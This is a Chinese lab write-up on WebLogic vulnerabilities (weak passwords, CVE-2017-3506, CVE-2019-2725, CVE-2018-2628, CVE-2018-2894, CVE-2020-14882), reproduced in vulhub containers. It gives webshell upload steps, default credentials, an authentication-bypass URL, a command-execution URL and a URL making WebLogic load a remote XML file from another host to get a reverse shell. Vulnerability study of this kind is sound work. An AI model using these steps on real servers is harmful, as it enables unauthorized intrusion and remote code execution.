常见中间件漏洞(二、WebLogin合集)

news2024/11/24 16:45:22

目录

二、WebLogic

Weblogic介绍

2.1 后台弱口令GetShell

漏洞描述

影响范围

环境搭建

漏洞复现

2.2 CVE-2017-3506

漏洞描述

影响版本

环境搭建

漏洞复现

2.3 CVE-2019-2725

漏洞描述

影响版本

环境搭建

漏洞复现

2.4 CVE-2018-2628

漏洞描述

漏洞影响

环境搭建

漏洞复现

2.5 CVE-2018-2894_

漏洞描述

漏洞版本

环境搭建

漏洞复现

2.6 CVE-2020-14882

漏洞描述

影响版本

环境搭建

漏洞复现

另外一种方式


二、WebLogic

Weblogic介绍

WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,默认端口:7001 WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。

2.1 后台弱口令GetShell

漏洞描述

通过弱口令进入后台界面,上传部署war包,getshell

影响范围

全版本(前提后台存在弱口令)

环境搭建
cd vulhub/weblogic/weak_password

docker-compose up -d

漏洞复现

默认账号密码:weblogic/Oracle@123

weblogic常用弱口令:https://cirt.net/passwords?criteria=weblogic这里注意, 单个账号错误密码5次之后就会自动锁定。

  1. 登录后台后,点击部署,点击安装,点击上传文件,

2.上传war包,jsp木马压缩成zip,修改后缀为war,上传

3.然后一直点击下一步,直到完成

4.访问部署好的war,并且用工具连接

http://60.205.170.32:7001/test/1.jsp

2.2 CVE-2017-3506

XMLDecoder反序列化漏洞

漏洞描述

Weblogic的WLS Security组件对外提供了webserver服务,其中使用了XMLDecoder来解析用户输入的XML数据,在解析过程中出现反序列化漏洞,可导致任意命令执行。

影响版本

受影响版本:WebLogic 10.3.6.0,12.1.3.0,12.2.1.1,12.2.1.2。

环境搭建
cd vulhub/weblogic/weak_password

docker-compose up -d
漏洞复现

访问以下目录中的一种,有回显如下图可以判断wIs-wsat组件存在

/wls-wsat/CoordinatorPortType

/wls-wsat/RegistrationPortTypeRPC

/wls-wsat/ParticipantPortType

/wls-wsat/RegistrationRequesterPortType

/wls-wsat/CoordinatorPortType11

/wls-wsat/RegistrationPortTypeRPC11

/wls-wsat/ParticipantPortType11

/wls-wsat/RegistrationRequesterPortType11

  1. 验证是否存在wls-wsat组件

http://60.205.170.32:7001/wls-wsat/CoordinatorPortType

2.在当前页面抓包之后,添加下面请求包,在标签之间分别写存放 jsp 的路径和要写入的123.jsp

3.访问URL

http://60.205.170.32:7001/bea_wls_internal/123.jsp

2.3 CVE-2019-2725

漏洞描述

wls9-async等组件为WebLogic Server提供异步通讯服务,默认应用于WebLogic部分版本。由于该WAR包在反序列化处理输入信息时存在缺陷,攻击者通过发送精心构造的恶意 HTTP 请求,即可获得目标服务器的权限,在未授权的情况下远程执行命令。

影响版本

weblogic 10.x weblogic 12.1.3

环境搭建
cd vulhub/weblogic/weak_password

docker-compose up -d

漏洞复现

1.漏洞验证

http://47.99.98.0:7011/_async/AsyncResponseService

如果出现一下页面,则说明存在漏洞

  1. 在当前页面抓包,修改请求包,写入shell

3.哥斯拉连接

http://47.99.98.0:7011/bea_wls_internal/12121.jsp

2.4 CVE-2018-2628

WebLogic T3协议反序列化命令执行漏洞(CVE-2018-2628)

漏洞描述

Weblogic Server中的RMI 通信使用T3协议在Weblogic Server和其它Java程序(客户端或者其它Weblogic Server实例)之间传输数据,服务器实例会跟踪连接到应用程序的每个Java虚拟机(JVM)中并创建T3协议通信连接,将流量传输到Java虚拟机.T3协议在开放WebLogic控制台端口的应用上默认开启, 攻击者可以通过T3协议发送恶意的的反序列化数据,进行反序列化,实现对存在漏洞的weblogic组件的远程代码执行攻击。

漏洞影响

Oracle WebLogic Server10.3.6.0.0 Oracle WebLogic Server12.1.3.0.0 Oracle WebLogicServer12.2.1.2.0 Oracle WebLogic Server12.2.1.3.0

环境搭建
cd vulhub/weblogic/CVE-2018-2628

docker-compose up -d

漏洞复现

1.直接使用利用工具(Liqun工具箱)

2.哥斯拉连接

http://47.99.98.0:7012/_async/cmd.jsp

2.5 CVE-2018-2894_

WebLogic文件任意上传漏洞

漏洞描述

Weblogic Web Service Test Page中一处任意文件上传漏洞,Web Service Test Page 在"生产模式"下默认不开启,所以该漏洞有一定限制。

漏洞版本

weblogic 10.3.6.0

weblogic 12.1.3.0

weblogic 12.2.1.2

weblogic 12.2.1.3

环境搭建
cd vulhub/weblogic/CVE-2018-2894

docker-compose up -d

这里环境后台密码是随机得,获取密码:docker-compose logs | grep password

设置Web服务测试开启

http://47.99.98.0:7013/console/login/LoginForm.jsp

设置web服务测试开启:域结构->base-domain->高级->启动Web服务测试页

点击保存,进入 config.do 文件进行设置,将目录设置为 ws utc 应用的静态文件css目录,访问这个目录是无需权限的,这一点很重要

http://47.99.98.0:7013/ws_utc/config.do

/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css

漏洞复现

1.点击安全,点击添加,上传一个jsp木马

2.右键审查元素,然后搜索16,找到对应时间戳

3.Webshell链接

http://47.99.98.0:7013/ws_utc/css/config/keystore/1722950569989_shell.jsp

时间戳_文件名.jsp

2.6 CVE-2020-14882

WebLogic远程代码执行漏洞

漏洞描述

CVE-2020-14882允许远程用户绕过管理员控制台组件中的身份验证CVE-2020-14883 允许经过身份验证的用户在管理员控制台组件上执行任何命令。使用这两个漏洞链,未经身份验证的远程攻击者可以通过 HTTP 在 Oracle WebLogic 服务器上执行任意命令并完全控制主机

影响版本

Oracle Weblogic Server 10.3.6.0

Oracle Weblogic Server 12.1.3.0

Oracle Weblogic Server 12.2.1.3

Oracle Weblogic Server 12.2.1.4

Oracle Weblogic Server 14.1.1.0

环境搭建
cd vulhub/weblogic/CVE-2020-14882

docker-compose up -d

漏洞复现

1.访问管理控制台

http://47.99.98.0:7014/console/login/LoginForm.jsp

使用以下url绕过登录认证

2.使用以下url绕过登录认证

http://47.99.98.0:7014/console/css/%252e%252e%252fconsole.portal

此时达到未授权得效果。还未能GetShel。可以利用第二个漏洞(CVE-2020-14883),这远程加载XML文件拿到Shell

3.首先访问以下 URL,以连接 2 个漏洞并执行以下命令

http://47.99.98.0:7014/console/%2e%2e%2fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/success');")

我们进入到docker中可以看到命令已经成功运行了

另外一种方式

1.制作一个恶意XML文件,将其提供到Weblogic可以访问得服务器上:

2.然后通过以下 URL,Weblogic 将加载此 XML 并执行其中的命令

http://47.99.98.0:7014/console/css/%252e%252e%252fconsole.portal?nfpb=true& pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://47.99.98.0/rce.xml")

成功接收到反弹的shell

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1986398.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

STM32学习笔记2 --- GPIO输入

目录 AD/DA 按键 传感器模块 传感器模块细节 按键模块电路 传感器模块接入电路 OLED ​编辑 代码 封装驱动代码 GPIO读取函数 按键控制LED代码 部分解释 光敏传感器代码 部分解释 接线图 c知识补充 AD/DA AD:模拟-数字转换 DA:数字-模拟…

使用Idea进行Java开发断点打不进去

我在进行打断点时 出现了这个问题导致我无法进行断点测试 问题原因: 打的断点太多了 ,导致线程冲突 解决办法 : 删除之前打完未去掉的断点 完美解决 Nice! 有可能会不小心点到断点失效键,断点有可能会变成灰色 则为无…

【系统分析师】-综合知识-企业信息化与系统规划

1、一个有效的客户关系管理( Customer Relationship Management,CRM)解决方案应具备畅通有效的客户交流渠道、对所获信息进行有效分析和(CRM 与 ERP 很好地集成)等特点。 通过将(人力资源、业务流程与专业技术&#x…

uniapp连接手机调试App,并最终打包成apk文件,和上传到应用商店的问题

对于一些刚开始使用uniapp开发app的同学来说,有时候仅仅是第一步连接手机进行开发测试都很难进行。这篇文章就来向大家介绍一些怎样连接手机进行调试我们开发中的项目,并最终将开发好的项目打成apk包进行安装,和将开发好的App应用上传到应用商…

【递归】用递归的方法求阶乘

用递归的方法求 阶乘&#xff0c;这里我们以 求5&#xff01;为例&#xff0c;使用C语言实现 #include<stdio.h>int fact(int n){if(n1){return 1;}elsereturn n*fact(n-1); }int main(){int result;resultfact(5);printf("5的阶乘是 &#xff1a;%d",result)…

宝众宝达IPO终止:原实控人去世时间矛盾,婚外情主角任总经理

近日&#xff0c;上海证券交易所披露的信息显示&#xff0c;江苏宝众宝达药业股份有限公司&#xff08;下称“宝众宝达”&#xff09;及其保荐人中信建投证券撤回上市申请文件。因此&#xff0c;上海证券交易所决定终止对其首次公开发行股票并在主板上市的审核。 据贝多财经了解…

XXLJob接入说明

1、配置 1.1、pom文件 引入依赖 <dependency><groupId>com.xuxueli</groupId><artifactId>xxl-job-core</artifactId> </dependency> 1.2、bootstrap.yml 增加xxljob读取配置 common-xxljob.yaml 内容如下&#xff1a; xxl:job:adm…

JavaScript(二十七)——JavaScript 函数定义

目录 JavaScript 函数定义 函数声明 函数表达式 Function() 构造函数 函数提升&#xff08;Hoisting&#xff09; 自调用函数 函数可作为一个值使用 函数是对象 箭头函数 JavaScript 函数定义 JavaScript 使用关键字 function 定义函数。 函数可以通过声明定义&#…

力扣第45题:跳跃游戏 贪心DP(C++)

给定一个长度为 n 的 0 索引整数数组 nums。初始位置为 nums[0]。 每个元素 nums[i] 表示从索引 i 向前跳转的最大长度。换句话说&#xff0c;如果你在 nums[i] 处&#xff0c;你可以跳转到任意 nums[i j] 处: 0 < j < nums[i] i j < n 返回到达 nums[n - 1] 的最…

【附保姆级教程】两个月内快速涨粉17万,变现2w+,儿童英语阅读,家长辅导孩子必备!

目录 一、前言 二、儿童英语阅读教程 第一步&#xff1a;利用AI代写英语阅读短文 第二步&#xff1a;使用Flux生成场景图 第三步&#xff1a;将文本转为音频 第四步&#xff1a;使用canva工具进行排版 第五步&#xff1a;剪辑视频 一、前言 大家好&#xff0c;我是小奇…

如何在国外市场推广中国游戏

在国外市场推广中国游戏需要一种考虑文化差异、市场偏好和有效营销渠道的战略方法。以下是成功向国际观众介绍和推广中国游戏的关键步骤和策略&#xff1a; 进行市场调研 了解目标市场&#xff1a;首先确定哪些外国市场对你的游戏最具潜力。考虑类似游戏类型的受欢迎程度、玩…

找工作准备刷题Day21 动态规划算法 (卡尔41期训练营 8.6)

上周有些事情回了趟老家&#xff0c;祝广大博友身体健康&#xff0c;多运动。前面的贪心算法题目后面慢慢补&#xff0c;近期找到了一个实习&#xff0c;大概持续三个月&#xff0c;现在计划是白天工作&#xff0c;晚上下班以后运动运动刷题。要加强牛客网那种两小时3道题的刷题…

【LVS】负载均衡--nat模式/实验

一、LVS运行原理 LVS:Linux Virtual Server &#xff0c;负载调度器&#xff0c;内核集成&#xff0c;章文嵩&#xff0c;阿里的四层 SLB(Server LoadBalance) 是基于LVSkeepalived 实现 LVS 官网 : http://www.linuxvirtualserver.org/ LVS 相关术语 VS: Virtual Server&…

poetry配置镜像

1.简介 poetry 是一个包管理和打包的工具。 在 Python 中&#xff0c;对于初学者来说&#xff0c;打包系统和依赖管理是非常复杂和难懂的。即使对于经验丰富的开发者&#xff0c;一个项目总是要同时创建多个文件&#xff1a; setup.py ,requirements.txt,setup.cfg , MANIFES…

Python爬虫入门:如何设置代理IP进行网络爬取或数据采集

在如今这个信息爆炸的时代&#xff0c;数据成为了最有价值的资源之一。而Python作为一种强大且易学的编程语言&#xff0c;被广泛应用于数据采集和网络爬虫中。然而&#xff0c;直接进行网络爬取往往会遇到IP被封禁的问题&#xff0c;因此使用代理IP就成了一个有效的解决方案。…

SpringBoot中读取配置的七种方法总结

❃博主首页 &#xff1a; 「码到三十五」 &#xff0c;同名公众号 :「码到三十五」&#xff0c;wx号 : 「liwu0213」 ☠博主专栏 &#xff1a; <mysql高手> <elasticsearch高手> <源码解读> <java核心> <面试攻关> ♝博主的话 &#xff1a…

Python | TypeError: unsupported operand type(s) for +=: ‘int’ and ‘str’

Python | TypeError: unsupported operand type(s) for : ‘int’ and ‘str’&#xff1a;深度解析 在Python编程中&#xff0c;遇到“TypeError: unsupported operand type(s) for : ‘int’ and ‘str’”这类错误通常意味着你尝试将一个整数&#xff08;int&#xff09;和…

基于OpenCV+MFC的视频读取与对象跟踪平台

基于OpenCVMFC的视频读取与对象跟踪平台 引言一、软件功能简介二、各个功能介绍1、视频操作模块功能介绍1.1打开视频1.2打开摄像头1.3开始录制1.4结束录制1.5暂停1.6恢复1.7关闭1.8还原 2、对象跟踪模块功能介绍2.1 BSM跟踪2.2 颜色跟踪2.3 光流跟踪2.4 KCF多对象跟踪 资源链接…

干货 | 2024步入数字化转型深水区,云原生业务稳定性如何保障(免费下载)

云原生业务的稳定性保障是一个涉及多个层面的复杂任务&#xff0c;以下是一些关键措施和策略&#xff0c;以确保云原生业务的高效稳定运行&#xff1a; 一、平台安全性评估与加固 云原生平台安全评估&#xff1a;对云原生平台&#xff08;如Kubernetes、Docker等&#xff09;…

数学建模--智能算法之鱼群算法

目录 核心原理 应用与实现 实现步骤 性能分析与改进 鱼群算法在解决哪些具体优化问题方面表现最佳&#xff1f; 如何根据不同的应用场景调整鱼群算法的参数设置以提高其性能&#xff1f; 鱼群算法与其他群体智能优化算法&#xff08;如遗传算法、粒子群优化&#xff09;…